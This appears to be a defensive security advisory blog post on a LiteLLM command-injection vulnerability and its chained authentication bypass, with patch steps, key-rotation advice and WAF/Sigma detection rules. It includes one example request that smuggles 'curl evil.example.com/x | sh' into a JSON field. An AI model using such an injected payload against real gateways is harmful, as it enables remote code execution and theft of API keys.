What is CVE-2026-42271 in LiteLLM?

CVE-2026-42271 is a command injection vulnerability in BerriAI LiteLLM (the popular AI gateway proxy) that affects the MCP stdio test endpoints. Originally disclosed as requiring authentication (CVSS 8.7), security researchers at Horizon3.ai showed that chaining CVE-2026-42271 with CVE-2026-48710 (a Starlette host-header validation bypass) results in unauthenticated remote code execution with CVSS 10.0. CISA added it to the Known Exploited Vulnerabilities catalog on June 8, 2026, confirming active exploitation in the wild.

What versions of LiteLLM are affected by CVE-2026-42271?

LiteLLM versions 1.74.2 through 1.79.1 are affected. The vulnerability is in the MCP server test endpoints introduced with the MCP integration in 1.74.2. Upgrade to LiteLLM 1.79.2 or later, which patches both CVE-2026-42271 (command injection) and the related host-header issue. If you cannot upgrade immediately, disable the MCP test endpoints by setting LITELLM_MCP_TEST_ENABLED=false and blocking the /mcp/test* paths at your reverse proxy.

How do I detect if my LiteLLM was exploited?

Check application logs for POST requests to /mcp/test, /mcp/stdio-test, or any /mcp/test* path containing shell metacharacters (semicolons, pipes, backticks, $()). Watch for host headers that don't match your allowlist — the chained exploit uses arbitrary host headers to bypass authentication. Outbound network connections from the LiteLLM process to unusual destinations are another signal. The Horizon3 attack research blog and pentest-tools.com have proof-of-concept payloads for blue-team verification.

Why does this matter for AI infrastructure teams?

LiteLLM is one of the most widely deployed AI gateways — used by enterprises to proxy traffic to OpenAI, Anthropic, Google, Bedrock, and self-hosted models with unified API, key management, and budget tracking. A successful exploit grants RCE on the gateway host, which typically holds API keys for every LLM provider the organization uses. Compromise leaks keys, lets attackers run unauthorized inference (cost attack), and provides a pivot point into the rest of the AI stack. This is why CISA flagged it for federal civilian agencies — exploitation is happening now.

Quick Answer

LiteLLM CVE-2026-42271 RCE: What AI Teams Must Patch

Published: June 10, 2026

LiteLLM CVE-2026-42271 RCE: What AI Teams Must Patch

On June 8, 2026, CISA added CVE-2026-42271 to the Known Exploited Vulnerabilities catalog. Chained with CVE-2026-48710, it’s an unauthenticated RCE with CVSS 10.0 — and LiteLLM is one of the most widely deployed AI gateways in production. Here’s what to do today.

Last verified: June 10, 2026

TL;DR

Item	Value
CVE ID	CVE-2026-42271
Component	BerriAI LiteLLM MCP stdio test endpoints
Vulnerability	Command injection
CVSS (standalone)	8.7 (High)
CVSS (chained with CVE-2026-48710)	10.0 (Critical)
Chained outcome	Unauthenticated RCE
Affected versions	LiteLLM 1.74.2 – 1.79.1
Fixed in	LiteLLM 1.79.2+
Disclosed	Late May 2026
Added to CISA KEV	June 8, 2026
EPSS score	61% (high likelihood of exploitation)
Active exploitation	Yes (confirmed in the wild)

What is LiteLLM and why does this matter?

LiteLLM (pip install litellm, ~40k+ GitHub stars) is the de-facto AI gateway / proxy server for organizations that want:

Unified API to call OpenAI, Anthropic, Google, AWS Bedrock, Cohere, Mistral, and self-hosted models with one client
API key management — secrets stay on the gateway, not on application servers
Budget tracking and rate limiting per-team, per-user, per-model
Observability — logging, metrics, cost tracking, prompt analytics
MCP (Model Context Protocol) integration — added in v1.74.2 in March 2026

It’s deployed at thousands of enterprises (startups to F500) as the single chokepoint for all outbound LLM traffic. A compromised LiteLLM host typically holds the API keys for every major LLM provider used by the organization.

That’s exactly why this vulnerability matters.

What CVE-2026-42271 actually does

The MCP stdio test endpoints (/mcp/test, /mcp/stdio-test) were intended for internal validation that MCP server configs work. They accept a command string and execute it via subprocess to spawn the configured MCP server for a quick handshake test.

The bug: insufficient input sanitization on the command argument. An authenticated user (including a low-privilege internal-user key) can inject arbitrary shell commands via metacharacters (;, |, &&, backticks, $()).

POST /mcp/test HTTP/1.1
Host: litellm-gateway.example.com
Authorization: Bearer sk-litellm-internal-low-priv-user

{
  "server": "npx @anthropic/test; curl evil.example.com/x | sh; #"
}

The original advisory rated this CVSS 8.7 because it required authentication.

The chained exploit (CVSS 10.0)

Horizon3.ai security researchers found that LiteLLM’s underlying Starlette web framework had a separate vulnerability — CVE-2026-48710 — that allows bypassing the authentication middleware by manipulating the HTTP Host header.

Chaining the two:

Attacker sends crafted Host header → bypasses LiteLLM’s auth check
Now unauthenticated, hits /mcp/test with shell-injection payload
RCE on the LiteLLM host as the litellm process user

This converts a “low-privilege authenticated user” vulnerability into a fully unauthenticated, internet-exploitable RCE. CVSS 10.0.

Why CISA flagged it on June 8, 2026

CISA’s Known Exploited Vulnerabilities (KEV) catalog only includes CVEs with documented active exploitation. The June 8 addition confirms:

Working exploit code is publicly available
Real-world exploitation has been observed (logging, honeypots, incident response)
Federal civilian agencies must patch within 21 days

The 61% EPSS score (Exploit Prediction Scoring System) further indicates a high likelihood of mass exploitation in the coming weeks.

Are you affected?

You’re vulnerable if:

You run LiteLLM proxy / gateway server (not just the litellm SDK in a Python script)
Version is 1.74.2 through 1.79.1
MCP integration is enabled (default in supported versions)
The proxy is accessible from the internet, internal network, or anywhere an attacker can reach

You’re NOT vulnerable if:

You only use litellm as a Python library (the SDK without proxy mode)
Your version is older than 1.74.2 (pre-MCP) or 1.79.2+ (patched)
The MCP test endpoints are blocked at your reverse proxy

What to do — today

Step 1 — Patch

# Pin to fixed version
pip install --upgrade 'litellm>=1.79.2'

# Or in Docker
docker pull ghcr.io/berriai/litellm:v1.79.2

# Or in Helm
helm upgrade litellm berriai/litellm --version 1.79.2

Step 2 — If you can’t patch immediately

# Disable MCP test endpoints
export LITELLM_MCP_TEST_ENABLED=false

# Block /mcp/test* at your reverse proxy (nginx example)
location ~ ^/mcp/test {
    return 403;
}

Step 3 — Rotate every LLM API key

Assume compromise. Rotate:

OpenAI API keys
Anthropic API keys
Google / Vertex AI keys
AWS Bedrock keys (rotate IAM credentials)
Cohere, Mistral, Together, Replicate, etc.
Any internal services that the LiteLLM host can reach

Step 4 — Investigate

Search application logs for POST requests to /mcp/test* with shell metacharacters
Search for unusual Host header values that don’t match your domain allowlist
Check outbound network connections from the LiteLLM host (PCAP / VPC flow logs)
Review LLM provider billing for unauthorized usage spikes

Step 5 — Lock down the gateway

Place LiteLLM behind a WAF (CloudFront, Cloudflare, AWS WAF)
Restrict access to known IPs / VPC CIDRs
Enforce mutual TLS for internal callers
Set strict egress filtering on the LiteLLM host

Detection signatures

Suricata / Snort

Watch for POST /mcp/test with shell metacharacters in the body.

CloudFlare / WAF rule

http.request.uri.path matches "^/mcp/(stdio-)?test"
and http.request.method eq "POST"
and (http.request.body.raw contains ";"
     or http.request.body.raw contains "|"
     or http.request.body.raw contains "`"
     or http.request.body.raw contains "$(")

Sigma rule (Splunk / Elastic)

title: LiteLLM CVE-2026-42271 Exploitation Attempt
detection:
  selection:
    http.request.method: POST
    http.request.path|contains: '/mcp/test'
  filter_shell_metachar:
    http.request.body|contains:
      - ';'
      - '|'
      - '`'
      - '$('
  condition: selection and filter_shell_metachar
level: high

What this says about AI supply chain security

The LiteLLM bug is a near-perfect case study for what’s coming as AI agents and MCP proliferate:

AI gateways concentrate trust — one component holds keys to every model provider
MCP rapid adoption outpaced security review — features shipped fast, hardening lagged
Open source AI tooling is high-value attack surface — high install count, often exposed to the internet
Chained vulnerabilities are the norm, not exception — auth bypass + sink bug = RCE
Active exploitation is the new baseline — automated scanners hit new AI infra CVEs within days

Expect more LiteLLM-class incidents in 2026. Vendors are racing — LangGraph proxy, Pulse, Bedrock AgentCore, Anthropic’s own proxies — and each one is a potential blast radius.

Sources

Horizon3.ai: CVE-2026-42271 Chained with CVE-2026-48710 LiteLLM Unauthenticated RCE
CISA KEV catalog entry (added June 8, 2026)
SentinelOne: CVE-2026-42271 Vulnerability Details
Pentest-Tools.com: LiteLLM Command Injection (CVE-2026-42271)
OpenCVE: CVE-2026-42271 Vulnerability Details (EPSS 61%)
GitLab Advisories: pypi/litellm CVE-2026-42271
cvefeed.io: BerriAI LiteLLM Command Injection
TheHackerWire: CVE-2026-42271 - High Vulnerability
NewsBreak: LiteLLM Flaw CVE-2026-42271 Exploited in the Wild

LiteLLM CVE-2026-42271 RCE: What AI Teams Must Patch

TL;DR

What is LiteLLM and why does this matter?

What CVE-2026-42271 actually does

The chained exploit (CVSS 10.0)

Why CISA flagged it on June 8, 2026

Are you affected?

What to do — today

Step 1 — Patch

Step 2 — If you can’t patch immediately

Step 3 — Rotate every LLM API key

Step 4 — Investigate

Step 5 — Lock down the gateway

Detection signatures

Suricata / Snort

CloudFlare / WAF rule

Sigma rule (Splunk / Elastic)

What this says about AI supply chain security

Related reading

Sources